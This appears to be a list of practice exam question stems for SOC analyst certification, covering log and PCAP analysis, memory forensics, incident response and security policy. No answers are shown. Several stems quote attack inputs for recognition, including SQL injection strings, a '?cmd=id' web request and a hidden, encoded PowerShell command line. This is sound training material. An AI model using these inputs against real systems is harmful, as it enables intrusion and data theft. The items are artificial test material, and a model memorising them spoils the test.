An analyst is investigating a Linux system and wants to view the current network connections. Which command is most appropriate to list listening TCP ports along with the associated processes?

Medium
386

A security team is implementing a remote access policy. Which TWO controls should be included to ensure secure remote access?

Hard
387

A security analyst is investigating a Linux host for signs of compromise. The analyst runs `ps aux` and notices a process named `kworker` with a high CPU usage. The analyst suspects this may be a masquerading malware process. Which TWO commands should the analyst use to verify whether this process is legitimate or malicious? (Choose two.)

Medium
388

A security analyst needs to ensure that a message has not been tampered with during transit and that the sender cannot deny sending it. Which cryptographic method should be used?

Hard
389

An organization's security policy requires that all security incidents be reported within one hour of discovery. A junior analyst notices an unauthorized login attempt but is unsure if it qualifies as an incident. What should the analyst do first?

Easy
390

Refer to the exhibit. Which security protocol is being configured?

Easy
391

A SOC manager is drafting the organization's incident response plan and wants to align it with the NIST SP 800-61 Rev. 2 lifecycle so that phases are clearly defined for auditors. Which sequence correctly represents the four phases of the incident response lifecycle as described in NIST SP 800-61 Rev. 2?

Easy
392

During an investigation, an analyst observes that a workstation resolves an internal hostname to an IP address that does not match the DHCP lease record, and subsequent SMB connections to that hostname reach an attacker-controlled server. Which attack technique best explains this behavior?

Hard
393

An analyst is reviewing a web server log and sees the following entry: '192.168.1.1 - - [25/Oct/2023:10:15:30 -0400] "GET /admin/index.php?cmd=id HTTP/1.1" 200 1532 "-" "Mozilla/5.0"'. What potential attack does this log entry suggest?

Medium
394

During a forensic analysis, an analyst uses NetworkMiner to extract files from a PCAP. One of the extracted files contains a PE executable with a known signature of a malware variant. Which phase of the Cyber Kill Chain does the file transfer most likely represent?

Hard
395

During an incident, the analyst finds that an attacker modified system files. Which security principle was primarily violated?

Medium
396

An employee is suspected of using company resources to access inappropriate websites. Which security policy most directly addresses this behavior?

Easy
397

A security analyst is investigating a potential data breach. Which two actions are examples of passive reconnaissance? (Choose two.)

Medium
398

Which of the following are responsibilities of the legal counsel role during incident response? (Choose two.)

Medium
399

Which Windows Prefetch file extension indicates that a program has been executed on the system?

Easy
400

GreenTech Inc. is a mid-sized company with 500 employees. The company uses Microsoft Exchange Online for email and has implemented a security policy that requires all employees to report suspicious emails to the security team. The security team uses a phishing simulation tool to train employees. In the past month, several employees have reported receiving emails that appear to be from the CEO requesting urgent wire transfers. The security team has blocked the sender domains and updated the email filters. However, one employee fell for the latest scam and transferred $50,000 to an account before reporting it. The security incident response plan states that any monetary loss must be reported to the board within 24 hours. The security analyst receives the report on Monday morning. What should the analyst do first based on the policy and best practices?

Hard
401

An analyst is analyzing a Linux system that may have been compromised. Which THREE artifacts would provide evidence of attacker activity? (Choose three.)

Hard
402

An analyst is investigating a Windows host and observes a suspicious process with PID 1337. Which THREE of the following Volatility commands would provide useful information about this process? (Choose three.)

Hard
403

A security operations center (SOC) manager is developing a playbook for handling phishing incidents. The playbook must specify the first action an analyst should take upon receiving a reported phishing email. Which action should be performed first according to standard incident response procedures?

Hard
404

A company's web server is overwhelmed by traffic from multiple compromised systems, causing it to become unresponsive to legitimate users. Which type of attack is this?

Medium
405

An analyst is investigating a suspected SQL injection attack captured in a PCAP. The analyst needs to identify TWO indicators in the HTTP traffic that would confirm a SQL injection attempt. Which two indicators should the analyst look for? (Choose two.)

Hard
406

An analyst sees these logs. What should be the immediate course of action?

Hard
407

A security analyst is analyzing a suspicious PE file. Using a hex editor, the analyst sees the MZ header (4D 5A). The file's entropy is calculated as 7.8. What does the high entropy most likely indicate?

Hard
408

A security analyst is examining a Linux host and wants to identify which user account was used to execute a specific command that modified a critical system file. Which of the following files would provide the MOST direct evidence of the user who executed the command?

Easy
409

A SOC analyst at Tier 1 receives an alert for a known malware signature. After initial investigation, the analyst finds that the alert is a false positive caused by an outdated signature. What should the analyst do next?

Medium
410

A security team is reviewing the confidentiality, integrity, and availability (CIA) triad for a new file-sharing service. The service must ensure that data cannot be altered in transit by unauthorized parties. Which security principle is primarily addressed by implementing TLS for all connections?

Easy
411

An analyst notices periodic HTTP GET requests to a suspicious domain every 60 seconds. The payload size is small and consistent. This behavior is characteristic of which phase of the Cyber Kill Chain?

Medium
412

A SOC analyst notices an internal host transmitting a series of ICMP Echo Request packets to an external IP, each with a payload size of exactly 1024 bytes and a repeating pattern. The echo replies are consistently the same size. Which type of activity does this most likely indicate?

Medium
413

A security team is analyzing a malware infection. Which two characteristics are typical of a worm? (Choose two.)

Medium
414

Which THREE of the following are common Indicators of Compromise (IoCs) used in threat intelligence?

Easy
415

A security analyst needs to verify the authenticity and integrity of a software update. The update is signed with a digital signature. Which key is used to verify the signature?

Medium
416

A security analyst is reviewing the organization's incident response plan and notices that the 'Lessons Learned' phase is scheduled only after major incidents. The analyst recommends that this phase be conducted after all incidents, regardless of severity. What is the primary benefit of this recommendation?

Hard
417

An organization has implemented a security information and event management (SIEM) system. The SOC analyst receives an alert indicating a high number of failed login attempts from a single IP address targeting a critical server. The analyst checks the server logs and finds that the server is configured to lock the account after 5 failed attempts. However, the alert shows thousands of attempts. Which of the following explains this discrepancy?

Hard
418

A security administrator is implementing a privileged access management (PAM) solution. Which practice best enforces the principle of least privilege for administrators?

Medium
419

A company is updating its security policy to align with the principle of least privilege. The IT director asks the security analyst to recommend a control that enforces this principle for user access to a financial application. Which control should the analyst recommend?

Easy
420

A security analyst is reviewing a Windows host for indicators of credential dumping. The analyst wants to identify artifacts that commonly indicate tools such as Mimikatz have been used on the system. Which two artifacts should the analyst look for? (Choose two.)

Medium
421

An analyst monitoring an internal network observes a host sending a large number of TCP segments with the URG flag set and a non-zero urgent pointer, but the urgent pointer value does not point to actual urgent data. The destination host appears to be processing the data normally. Which explanation best describes what the analyst is observing?

Hard
422

A SOC analyst is analyzing NetFlow data and notices a sudden spike in outbound traffic from a single internal host to an external IP address during non-business hours. The traffic volume is significantly higher than the baseline. Which suspicion is most likely?

Hard
423

A Linux server has been compromised. The analyst checks for persistence mechanisms. Which THREE of the following are common Linux persistence techniques that should be examined? (Select THREE)

Hard
424

Which THREE are examples of social engineering attacks? (Select three.)

Medium
425

A security analyst is reviewing a packet capture and notices that a host is sending TCP segments with the SYN flag set to a range of ports on a single target, but the source IP address in each segment is spoofed to a different random address. The target replies with SYN-ACK packets to those spoofed addresses, and the host never completes the handshake. Which type of attack is this host performing?

Medium
426

A security analyst is reviewing a packet capture of traffic entering the corporate network. The analyst notices a large number of TCP SYN packets sent to multiple destination ports on a single internal host, with no corresponding ACK packets. The source IP addresses are spoofed and vary across each packet. Which type of attack is this traffic MOST likely associated with?

Medium
427

A security analyst at a medium-sized enterprise notices that an employee's workstation has been sending outbound traffic to a known malicious IP address at irregular intervals. The analyst runs a scan and finds no malware signatures. What should the analyst do next?

Medium
428

An analyst reviews IDS alerts and sees multiple alerts for the same signature from different internal IPs targeting the same external server. One common cause is...

Medium
429

A security analyst is reviewing a suspicious file found on a user's workstation. The file has a .docx extension but when the analyst inspects its header bytes, the file begins with the magic number for a Windows Portable Executable. The user reports the file arrived as an email attachment. Which type of malware delivery technique does this describe?

Easy
430

An analyst uses 'sc query' on a Windows host and finds a service named 'WindowsUpdate' with a binary path pointing to 'C:\Users\Public\update.exe'. The service is running. Why is this suspicious?

Medium
431

A security manager is developing a business continuity plan (BCP) and needs to determine the maximum tolerable downtime (MTD) for a critical order-processing system. The system generates $10,000 in revenue per hour. If the system is down for more than 4 hours, the company will lose a key customer. What is the MTD for this system?

Medium
432

An analyst is reviewing Windows Event Logs and sees multiple Event ID 4625 entries from a single IP address. What does this indicate?

Medium
433

A security analyst is investigating a Windows host and wants to view running processes along with their parent-child relationships and command-line arguments. Which tool is best suited for this task?

Easy
434

A security analyst is reviewing a Snort alert that triggered on the signature 'ET TROJAN Win.Trojan.Generic'. What is the most likely reason this alert fired?

Easy
435

A healthcare organization has a security policy that mandates immediate reporting of any potential data breach to the privacy officer. An analyst notices that an employee accidentally emailed a patient list to the wrong recipient. The recipient is known to be a trusted partner, but the email contained PHI. The analyst contacts the recipient who acknowledges receipt and agrees to delete the email. What should the analyst do next?

Easy
436

Which encryption method uses a single key for both encryption and decryption of data?

Medium
437

A SOC analyst needs to create a SIEM correlation rule to detect a brute force attack against SSH on a server. Which of the following would be the most effective rule logic?

Easy
438

Match each Cisco CyberOps concept to its description.

Medium
439

An analyst inspects a PCAP and sees an internal host sending HTTP requests where the User-Agent string is unusually long and contains random alphanumeric characters, and the Cookie header carries base64-like data to an external server. The server responds with small HTTP 200 OK messages. Which technique is most consistent with this traffic?

Hard
440

A security analyst is reviewing logs from a web server and notices a high volume of HTTP requests from a single IP address targeting the same login page within a short time frame. The analyst suspects a brute force attack. Which TWO actions are most appropriate to mitigate this type of attack? (Choose two.)

Medium
441

A security analyst is collecting evidence from a compromised system for legal proceedings. Which TWO actions are critical to preserve the integrity of the evidence?

Medium
442

An organization classifies data into Public, Internal, Confidential, and Restricted tiers. A developer needs to place a dataset containing customer payment card numbers into the correct tier and apply the required handling controls. According to common data classification practices, which tier and control combination is most appropriate?

Medium
443

A SOC analyst notices that a workstation is generating NetFlow records showing repeated outbound connections to 203.0.113.45 on port 443 at regular 60-second intervals, with each flow transferring approximately 4 KB. The destination IP has no reputation data. Which analysis approach would best determine whether this traffic represents C2 beaconing?

Medium
444

While analyzing a PCAP, an analyst uses the Wireshark filter 'http.request' and finds a URI parameter containing '%27%20UNION%20SELECT%201,2,3%20--'. What type of attack is indicated?

Medium
445

A SOC analyst is investigating a suspicious file on a Windows host. The file hash matches a known malware variant in a threat intelligence feed. What is the next best step for host-based analysis?

Easy
446

Which type of malware is designed to replicate itself and spread to other systems without user intervention?

Medium
447

Which principle ensures that a user cannot deny having performed an action?

Easy
448

A network analyst is examining a PCAP and sees a large number of ICMP echo request packets sent from a single internal host to multiple external IP addresses, with varying payload sizes and no corresponding echo replies. The analyst suspects the host is being used for reconnaissance or data exfiltration. Which characteristic of the ICMP traffic would most strongly indicate that it is being used for data exfiltration rather than simple reconnaissance?

Easy
449

Based on the exhibit, which type of traffic is being denied?

Easy
450

An analyst needs to review the Windows event logs from a host to determine if a user's account was used to log in at an unusual time. Which log type should the analyst check?

Easy
451

A security policy mandates that all network devices must be hardened. Which THREE of the following are common hardening best practices for routers and switches? (Select three.)

Hard
452

An analyst is tuning a Cisco Firepower intrusion policy. A rule fires repeatedly with the message 'MALWARE-CNC Outbound connection to known malicious domain' against a marketing workstation. Packet capture shows the workstation resolving and connecting to a domain that the threat intelligence feed lists, but the endpoint shows no malicious process, no persistence, and the user states they clicked a link in a phishing email an hour earlier. Which action best reflects sound incident handling at this stage?

Hard
453

A Security Operations Center (SOC) uses Security Information and Event Management (SIEM) with event correlation. Analysts notice that alerts for a specific malware signature have decreased sharply after a new firewall rule was deployed. However, endpoint scans still show infections on several hosts. What is the most likely explanation for the decrease in SIEM alerts?

Hard
454

Which TWO of the following are key elements that should be included in an incident response plan?

Easy
455

A security analyst at a mid-sized company is reviewing the organization's risk management strategy. The CIO asks the analyst to describe the primary purpose of a vulnerability assessment. Which statement best describes this purpose?

Easy
456

During an incident response engagement, an analyst is examining a Windows Server 2019 host that is suspected of being compromised. The analyst wants to determine which user accounts were used to log on interactively to the console in the last 24 hours. Which Windows artifact should the analyst query to obtain this information?

Hard
457

You are a security analyst at a financial institution. The network consists of a traditional perimeter firewall, an internal IDS (Snort), and a separate network monitoring tool that captures full packet data. Recently, the bank experienced a breach where an attacker exfiltrated customer data via DNS tunneling. The attack went undetected for weeks. The CISO wants to improve detection of data exfiltration and has tasked you with proposing a new monitoring strategy. The current IDS has signatures for common malware C2 channels but no specific DNS tunneling rules. You have access to the full packet capture archive. Which approach would be most effective in detecting DNS tunneling while minimizing false positives?

Hard
458

A security analyst discovers that an attacker is using a vulnerability scanning tool to identify open ports on the company's network. Which type of attack is being performed?

Easy
459

Which threat intelligence sharing standard defines a language and format for representing structured threat information, such as indicators and campaigns?

Medium
460

Which NIST Cybersecurity Framework function involves developing and implementing appropriate safeguards to ensure delivery of critical infrastructure services?

Easy
461

A security analyst is reviewing the firewall log exhibit. The analyst suspects that this traffic might be part of a command-and-control (C2) communication based on the packet size and the timing of similar events. Which TWO additional pieces of evidence would most strongly support the suspicion of C2 traffic?

Hard
462

An attacker intercepts communication between a client and server and modifies the data being transmitted. The client and server are unaware of the modification. Which type of attack is being performed?

Hard
463

During an investigation, an analyst finds that an internal host has been communicating with a known malicious IP on port 445. Which protocol is most likely involved?

Medium
464

A system administrator needs to grant access to a database for a new employee. According to the principle of least privilege, what should be done?

Medium
465

A company uses a SIEM with correlation rules. They notice that a rule designed to detect brute-force attacks is not triggering even though failed logins are occurring. Which is the most likely cause?

Medium
466

A security analyst is reviewing the access control strategy for a research and development department. The department handles highly sensitive intellectual property, and the organization wants to ensure that employees can only access information strictly necessary for their current project tasks, even if they have previously worked on other projects. Which access control principle is being enforced?

Medium
467

Your organization recently deployed a new web application that uses HTTPS. The security team notices that the IDS is generating a large number of alerts for 'SSL/TLS handshake anomalies' and 'self-signed certificates'. After investigating, you find that many of these alerts are coming from a legitimate internal scanning tool that uses a self-signed certificate. The IDS also reports a high rate of 'TLS renegotiation' attempts from the same source. The CISO wants to reduce false positives while maintaining visibility. The IDS is based on Suricata and uses a default rule set. What is the best course of action?

Medium
468

A security policy requires that all remote access be authenticated using a one-time password (OTP) token. Which technology should be implemented?

Medium
469

A security analyst is reviewing a packet capture and observes that a workstation is sending a large volume of TCP SYN packets to many different destination IP addresses on port 445, with no corresponding completed handshakes. The analyst suspects malware is performing reconnaissance. Which type of activity is this workstation most likely performing?

Medium
470

An analyst is investigating a Windows 10 workstation suspected of being compromised. The analyst runs `wmic process get name,processid,parentprocessid,commandline` and observes a process named `powershell.exe` with the command line `powershell -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAA...`. What does the `-enc` parameter indicate about how the command was executed?

Medium
471

A financial services company must retain security event logs for a period defined by its policy and applicable regulations. The security architect is documenting how long different log sources must be kept and where. Which statement best reflects a sound log retention practice for security operations?

Medium
472

Based on the exhibit, what condition triggers an alert?

Hard
473

Which element of the CIA triad is primarily compromised when an attacker successfully intercepts and reads encrypted network traffic without authorization?

Easy
474

A critical security patch for a widely exploited vulnerability is released. The patch requires a system reboot during business hours. According to change management policy, what is the best procedure?

Medium
475

An analyst is investigating a potential data exfiltration. The logs show a series of DNS queries with subdomains that appear to be base64-encoded strings. Which technique is likely being used?

Hard
476

An analyst runs Volatility's pstree plugin on a memory dump. The output shows that a process 'svchost.exe' is the child of 'explorer.exe'. What is suspicious about this?

Medium
477

A company's incident response policy defines four phases: Preparation, Detection & Analysis, Containment Eradication & Recovery, and Post-Incident Activity. During an active ransomware outbreak, the IR team is unable to contain the spread because the containment plan did not account for the malware's use of PowerShell for lateral movement. Which phase had a deficiency?

Medium
478

A security analyst is reviewing the chain of custody form for a laptop seized from an employee suspected of intellectual property theft. The form shows the laptop was collected by the IT manager, transported to a storage room, and later examined by an outside forensics firm. The analyst notices that the form lacks signatures for the transfer between the IT manager and the storage room custodian. What is the most likely impact of this omission on the investigation?

Medium
479

A security analyst is reviewing network traffic and observes a large number of DNS queries for randomly generated domain names, such as 'a1b2c3d4e5f6g7h8.com', from a single internal host. The queries are followed by responses with very short TTL values. The analyst suspects the host is compromised. Which type of malicious activity is most likely occurring?

Medium
480

A SOC analyst sees an alert for 'Possible SQL Injection' on a web server. Reviewing the PCAP, the analyst finds the parameter 'id=1 OR 1=1' in the HTTP request. However, the web server returns a normal page with no signs of compromise. What is the correct classification?

Medium
481

Which cryptographic technique uses a public and private key pair to provide non-repudiation?

Medium
482

Which THREE are principles of the CIA triad? (Select three.)

Hard
483

An attacker intercepts communication between two parties and modifies the data before forwarding it. Which type of attack is this?

Medium
484

A forensic analyst uses Volatility on a memory dump and runs the 'malfind' plugin. The output shows a process with a VAD region that has PAGE_EXECUTE_READWRITE protection and contains the pattern 'MZ'. What does this indicate?

Hard
485

A security analyst needs to ensure data integrity. Which control best achieves this?

Easy
486

According to the principles of least privilege, which THREE of the following access controls should be implemented for a typical user account? (Choose three.)

Hard
487

A SOC analyst is reviewing a Windows 10 endpoint after a suspected compromise. They need to determine which user account was responsible for a specific process that was launched shortly before the alert. Which Windows artifact directly records the user account associated with process creation events and should be queried using Windows Event Log?

Medium
488

A healthcare organization stores patient records and must comply with the HIPAA Security Rule. The CISO wants to document the types of safeguards that protect data through encryption, access controls, and audit logging. Which category of safeguards under the HIPAA Security Rule covers these controls?

Easy
489

A SOC analyst receives an alert about a Windows workstation that may be infected with malware. The analyst wants to examine the system's boot configuration to determine if the malware modified boot settings to disable driver signature enforcement. Which Windows tool should the analyst use to view the current boot configuration data?

Medium
490

An analyst discovers that an employee has been using company-issued laptops to run a personal cryptocurrency mining software. Which policy violation has occurred?

Medium
491

A security analyst is analyzing a memory dump from a compromised Windows system using Volatility. Which command would best reveal hidden or injected code within a process?

Hard
492

Which OSI layer is associated with protocols such as HTTP, FTP, and SMTP, and is commonly targeted by application-layer attacks?

Easy
493

Which Windows Event ID corresponds to a successful user logon?

Easy
494

A security analyst is reviewing a Windows 10 endpoint that is suspected of being compromised. The analyst opens Task Manager and notices a process named 'lsass.exe' running with a PID of 1234, but its parent process is 'cmd.exe' rather than 'wininit.exe'. The analyst also observes that the process path is 'C:\Users\Public\lsass.exe'. Which type of attack is most likely indicated by these findings?

Medium
495

An analyst examines a PCAP and observes that an internal host sends an ICMP echo request containing a payload of 1200 bytes, followed by an ICMP echo reply from an external host with a payload of 1500 bytes. The payload data does not match standard ping patterns and appears to contain encoded file fragments. Which technique is most consistent with this observation?

Hard
496

A SOC analyst is analyzing a PCAP from a suspected intrusion. The traffic shows a series of TCP connections where the client sends a SYN, receives a SYN-ACK, then immediately sends a RST instead of an ACK, and this pattern repeats across multiple ports on the same target. Which type of scan is most likely being performed?

Medium
497

An IDS generates an alert for a signature that matches HTTP traffic containing 'cmd.exe' in the URI. The analyst checks the packet and sees the URI is actually 'cmd.exe?help'. What should the analyst do?

Easy
498

A vendor security policy requires that all third-party remote access be limited to specific IP addresses and use multi-factor authentication. During an audit, it is discovered that a vendor's entire office subnet is allowed instead of individual IPs. The vendor argues that the broader range is necessary for redundancy. What is the best way to handle this from a policy perspective?

Hard
499

Which THREE types of network traffic anomalies are strong indicators of a data exfiltration attempt?

Hard
500

An intrusion detection system alerts on HTTP traffic containing the string 'UNION SELECT' in the URI parameter. This is most indicative of what type of attack?

Hard
501

An organization uses Windows 10 Enterprise workstations with standard user accounts (no local admin). Users run daily tasks including web browsing, document editing, and accessing a corporate intranet. Recently, the security team detected anomalous outbound traffic from one workstation to an IP address in a foreign country. The workstation's host-based firewall shows that a process named 'svch0st.exe' initiated the connection. Additionally, a scheduled task named 'UpdateTask' runs every hour with SYSTEM privileges, executing a script from a hidden folder. The user reports no unusual behavior except occasional system slowdowns. The analyst must determine the best immediate course of action. Which action should the analyst take first?

Medium
502

Which TWO are examples of risk treatment options? (Select two.)

Easy
503

A company's web server is overwhelmed with traffic from many compromised devices, causing legitimate users to be unable to access the site. What type of attack is this?

Medium
504

A user receives an email that appears to be from their bank, asking them to click a link and verify their account details. The email contains a sense of urgency. Which type of attack is this?

Medium
505

Match each Linux command to its function.

Medium
506

An analyst uses Volatility's 'netscan' on a memory dump and finds an established connection to an external IP on port 4444. Which type of activity is this commonly associated with?

Medium
507

A security analyst notices repeated failed login attempts from a single IP address to the company's VPN gateway. Which action should the analyst take first?

Easy
508

A PCAP contains an HTTP POST request with a parameter containing "UNION SELECT username, password FROM users". This is evidence of:

Medium
509

Refer to the exhibit. An analyst examines the port security status on a switch interface. What action should the analyst take to restore connectivity to the device connected to this port?

Medium
510

A network analyst is examining a PCAP and notices a series of TCP packets with the PSH flag set and small payload sizes, sent from an internal host to an external IP. The external IP responds with similar small packets. The communication is continuous and occurs at regular intervals. Which type of activity is most likely occurring?

Medium
511

A SOC analyst receives an alert for 'Malware Detected' from an endpoint sensor. The analyst checks the endpoint and sees a file named 'invoice.exe' in the Downloads folder. What should the analyst do first?

Easy
512

A junior analyst is asked to identify which type of log would best show whether a Windows workstation attempted to authenticate to a file share on another server. Which log source should the analyst consult?

Easy
513

An analyst uses Wireshark to examine network traffic and wants to see only packets that contain the string 'password'. Which type of filter should be applied?

Medium
514

An analyst is reviewing a suspicious email reported by a user. The email contains an attachment 'invoice.pdf' and urges the user to open it. Which indicator is most likely to confirm it is a phishing attempt?

Easy
515

An analyst reviews PCAP traffic and sees a series of HTTP POST requests from an internal host to an external IP at exactly 60-second intervals. The payload size is consistent. Which phase of the Cyber Kill Chain does this activity most likely represent?

Medium
516

A security analyst is examining a suspicious executable found on a compromised host. Static analysis reveals that the file contains a packer and obfuscated strings. When run in a sandbox, it attempts to connect to an external IP address and modifies registry keys for persistence. Which stage of the cyber kill chain does the registry modification represent?

Medium
517

A SIEM correlation rule triggers when more than 10 failed login attempts from a single source IP occur within 1 minute. This rule is designed to detect:

Medium
518

A SOC analyst is reviewing a NetFlow record and sees that a single internal IP has communicated with multiple external IPs on port 445 (SMB) within a short time frame. Which type of activity is most likely indicated?

Hard
519

An analyst reviews an IDS alert indicating a TCP SYN scan against a web server. The analyst wants to confirm the scan by examining packet-level evidence in the PCAP. Which TWO characteristics would confirm a SYN scan rather than legitimate client behavior? (Choose two.)

Medium
520

An organization uses Cisco AMP for Endpoints. A file with a low prevalence score is executed on multiple endpoints, and AMP identifies it as malicious after behavioral analysis. The analyst needs to ensure that all endpoints are protected from this file. Which action should be taken?

Hard
521

A network security analyst is reviewing NetFlow records from a perimeter router and observes that an internal server at 172.16.5.20 has transferred approximately 4.5 GB to an external IP address in country X over the past three hours, all during non-business hours. The destination IP has no prior communication history with the organization and the traffic uses port 443. Which analysis approach would best confirm whether this represents data exfiltration?

Medium
522

An analyst is reviewing a PCAP and sees multiple HTTP requests with the parameter 'id=1 UNION SELECT username,password FROM users'. What type of attack is being attempted?

Medium
523

A security administrator is reviewing the company's incident response plan and wants to ensure that the team understands the difference between a vulnerability, a threat, and a risk. During a tabletop exercise, the administrator presents a scenario: a web server has an unpatched Apache Struts vulnerability, and a known exploit exists publicly. Which term best describes the unpatched Apache Struts vulnerability in this context?

Easy
524

Drag and drop the steps for the DHCP DORA process (dynamic host configuration) into the correct order.

Medium
525

Which THREE of the following are common types of security policies that organizations typically implement?

Medium
526

An analyst is investigating a malware infection on a workstation. The malware appears to be a trojan that downloads additional payloads and allows remote control. The analyst needs to classify the malware based on its behavior. Which THREE characteristics match this description? (Choose three.)

Hard
527

A security analyst is reviewing logs and notices that an attacker has intercepted and modified communications between two devices without their knowledge. Which type of attack is this?

Medium
528

A security manager is drafting an incident response policy and wants to ensure that the organization can legally monitor employee communications during an investigation. The manager asks the legal team what element must be included in the employee handbook and policy documents to support this capability. Which element is most critical?

Medium
529

A company processes credit card payments and must comply with a framework that mandates specific security controls for protecting cardholder data. Which compliance framework applies?

Hard
530

An security auditor finds that the company's backup policy does not include offsite storage. The security policy requires that backups be stored in a geographically separate location. What should the company do?

Medium
531

A security analyst is investigating a Linux server that is suspected of hosting a reverse-shell backdoor. The analyst wants to identify which running process is maintaining the outbound connection and which user context it is running under. Which TWO commands would best provide this information? (Choose two.)

Medium
532

A security analyst discovers that an attacker exfiltrated data using DNS tunneling. Which TWO controls should be implemented to detect or prevent this? (Select two.)

Hard
533

During incident response, an analyst extracts files from a PCAP using Wireshark's Export Objects feature. One extracted file is a PDF that triggers an IDS alert for 'Exploit:PDF/HeapSpray'. Which technique does this alert describe?

Hard
534

A SOC analyst is reviewing NetFlow records exported from the border router. A single internal workstation is generating a steady stream of outbound sessions to dozens of unique external IP addresses on TCP port 443, each lasting only a few seconds, every day at 02:00. No corresponding firewall denies are logged. Which security monitoring conclusion is most appropriate?

Medium
535

A security analyst discovers that a former employee's user account remains active 45 days after termination, and audit logs show that the account was used to access a file server twice in the past week. Which element of the access control lifecycle was MOST directly violated?

Medium
536

A security analyst observes periodic outbound HTTPS connections to an unusual domain that resolves to different IP addresses each time. This behavior is most indicative of:

Medium
537

You are the cybersecurity analyst for a small business that has a security policy requiring all network traffic to pass through a proxy server for content filtering. Recently, employees have been complaining that some websites are not loading correctly. You check the proxy logs and see that the proxy is blocking traffic that appears to be from non-standard ports. However, upon investigation, you find that the blocked sites are legitimate business tools that use custom ports. Which action aligns with the security policy?

Medium
538

An analyst is reviewing a Linux host that is suspected of being compromised. The analyst runs 'ls -l /proc/1234/exe' and sees that the symbolic link points to '/tmp/.hidden/backdoor'. The process with PID 1234 is owned by root and was started from an unknown parent process. Which of the following best describes what the analyst has discovered?

Medium
539

A company uses a SIEM that collects logs from firewalls, servers, and endpoints. The SIEM is generating a high volume of low-priority events, causing analysts to miss critical alerts. Which approach would best improve the signal-to-noise ratio?

Hard
540

A security analyst is reviewing logs from a network-based IPS that detected traffic from an internal host connecting to a known malicious IP address on port 6667. The traffic is encrypted IRC. Which conclusion is most likely?

Medium
541

A security analyst suspects that a Windows workstation was compromised by malware that schedules a recurring task to maintain persistence. The analyst opens Task Scheduler and sees dozens of scheduled tasks. Which built-in command-line utility should the analyst use to export a detailed list of all scheduled tasks, including the actions they perform, so the list can be reviewed offline?

Medium
542

A Cisco Firepower sensor is generating an alert for a known benign application. The analyst has verified it is a false positive. What is the first step to suppress this alert?

Medium
543

An analyst reviews Snort alert logs and sees many alerts for 'SQL Injection Attempt' from a single external IP to a public-facing web server. Which analysis step is most effective?

Medium
544

A security analyst is investigating a potential exploit. The PCAP shows a HTTP POST request containing a long string of characters that, when decoded, reveals a series of return-oriented programming (ROP) gadgets. What is the likely purpose of this payload?

Hard
545

An analyst is investigating an alert for a potential ICMP tunneling attack. The analyst reviews a PCAP and notices a series of ICMP Echo Request packets with unusually large payloads (over 1000 bytes) and varying payload contents, sent from an internal host to an external IP address. The external host replies with ICMP Echo Reply packets of similar size. Which characteristic most strongly supports the conclusion that this is ICMP tunneling rather than normal ping traffic?

Medium
546

Which two characteristics are commonly associated with a distributed denial-of-service (DDoS) attack?

Medium
547

Which compliance framework is specifically designed to protect the privacy and security of electronic health information in the United States?

Medium
548

A security analyst is reviewing logs from a web proxy and sees that a user's machine is making frequent connections to a domain that is registered recently and has a low reputation score. What is the best action?

Medium
549

A company wants to protect its web application from injection attacks by ensuring that user-supplied input is not interpreted as code by the backend database. Which control should be implemented?

Medium
550

Which TWO actions should an analyst take when a critical alert is triggered?

Easy
551

Which of the following is a common indicator of a brute-force attack on an SSH server?

Easy
552

Which type of malware is characterized by self-replication and spreading to other systems without user interaction, often causing network congestion?

Medium
553

An analyst detects an attack where the attacker uses NTLM authentication with a hashed password instead of the plaintext password. This technique is known as:

Hard
554

A threat hunter reviews Cisco Umbrella DNS logs and notices repeated queries for randomly generated subdomains under a single parent domain, each resolved by a different authoritative name server. The hunter suspects DNS tunneling. Which additional artifact would most directly confirm command-and-control activity rather than legitimate DNS behavior?

Hard
555

A SOC analyst is analyzing logs from multiple sources. Which THREE log types are most useful for detecting a brute force attack against a web application?

Hard
556

A security analyst at a SOC Tier 1 receives an alert about a potential malware infection on a user's workstation. What is the primary responsibility of the Tier 1 analyst in this scenario?

Medium
557

A security analyst is using a SIEM to create a correlation rule that triggers when more than 10 failed logins are detected from the same source IP within 1 minute. This rule is designed to detect which type of attack?

Easy
558

An organization uses Zeek for network monitoring. An analyst wants to extract files transferred over HTTP from network traffic. Which Zeek script or functionality should they use?

Hard
559

Which of the following is a valid indicator of compromise (IoC)?

Easy
560

During a threat hunt, an analyst discovers sustained outbound traffic from a workstation to multiple IP addresses in different countries on port 443. The traffic patterns show periodic spikes at 5-minute intervals. The workstation is used by a sales representative who frequently accesses cloud CRM. Which additional evidence would most strongly suggest the workstation is compromised?

Hard
561

What is the purpose of a security baseline?

Easy
562

Which THREE of the following are common evasion techniques used by attackers?

Hard
563

During the containment phase of an incident, the IR team decides to power off a compromised server to prevent further damage. However, they later realize that this action may have destroyed volatile evidence. According to best practices, what should the team have done instead?

Hard
564

A security analyst is investigating a potential data exfiltration incident. Which TWO of the following are common indicators that data exfiltration may be occurring over DNS? (Choose two.)

Medium
565

A security analyst is configuring a firewall to block common reconnaissance techniques. Which THREE types of reconnaissance traffic should be blocked to prevent active reconnaissance? (Choose three.)

Medium
566

A SOC analyst is reviewing a PCAP captured at the network perimeter. The analyst notices that a single internal host sends a series of ICMP echo requests to multiple external hosts, but the ICMP payload size is unusually large (over 1000 bytes) and the payload contains non-ASCII, high-entropy data. The echo replies from the external hosts are also large and contain similar data. Which type of activity is most likely occurring?

Medium
567

Refer to the exhibit. An analyst sees these log messages on a Cisco router. The source IP 10.0.0.2 is an internal server. What is the most likely explanation?

Hard
568

A security analyst is examining a suspicious executable and wants to extract readable strings to identify potential C2 domains or file paths. The analyst has the file on a Windows workstation and needs to use a built-in or commonly available tool. Which approach is most appropriate?

Medium
569

Which THREE of the following are indicators that a network may be compromised by a botnet?

Hard
570

A security analyst is creating a policy for handling sensitive customer data. The policy must ensure data is encrypted at rest and in transit. Which type of policy most directly addresses this requirement?

Medium
571

An organization's security policy requires that all data at rest on laptops be encrypted. An employee reports that their laptop was stolen. Which control would most likely prevent data exposure?

Easy
572

A security analyst is reviewing a suspicious file recovered from a compromised endpoint. The file contains a macro that, when opened, launches PowerShell to download a second-stage payload from a remote server. The analyst wants to classify this file based on its behavior. Which classification is most accurate?

Hard
573

A company is implementing a security policy that requires all employees to use multi-factor authentication (MFA) when accessing corporate resources remotely. However, during a recent security audit, it was found that several employees have been using app passwords for legacy applications that do not support MFA. What is the best practice under this policy?

Hard
574

A security analyst is reviewing an incident response policy that requires the team to preserve evidence for potential legal action. The analyst notices that the policy does not address how to handle evidence when a compromised system must be rebooted to restore services. What should the analyst recommend to balance evidence preservation with operational recovery?

Hard
575

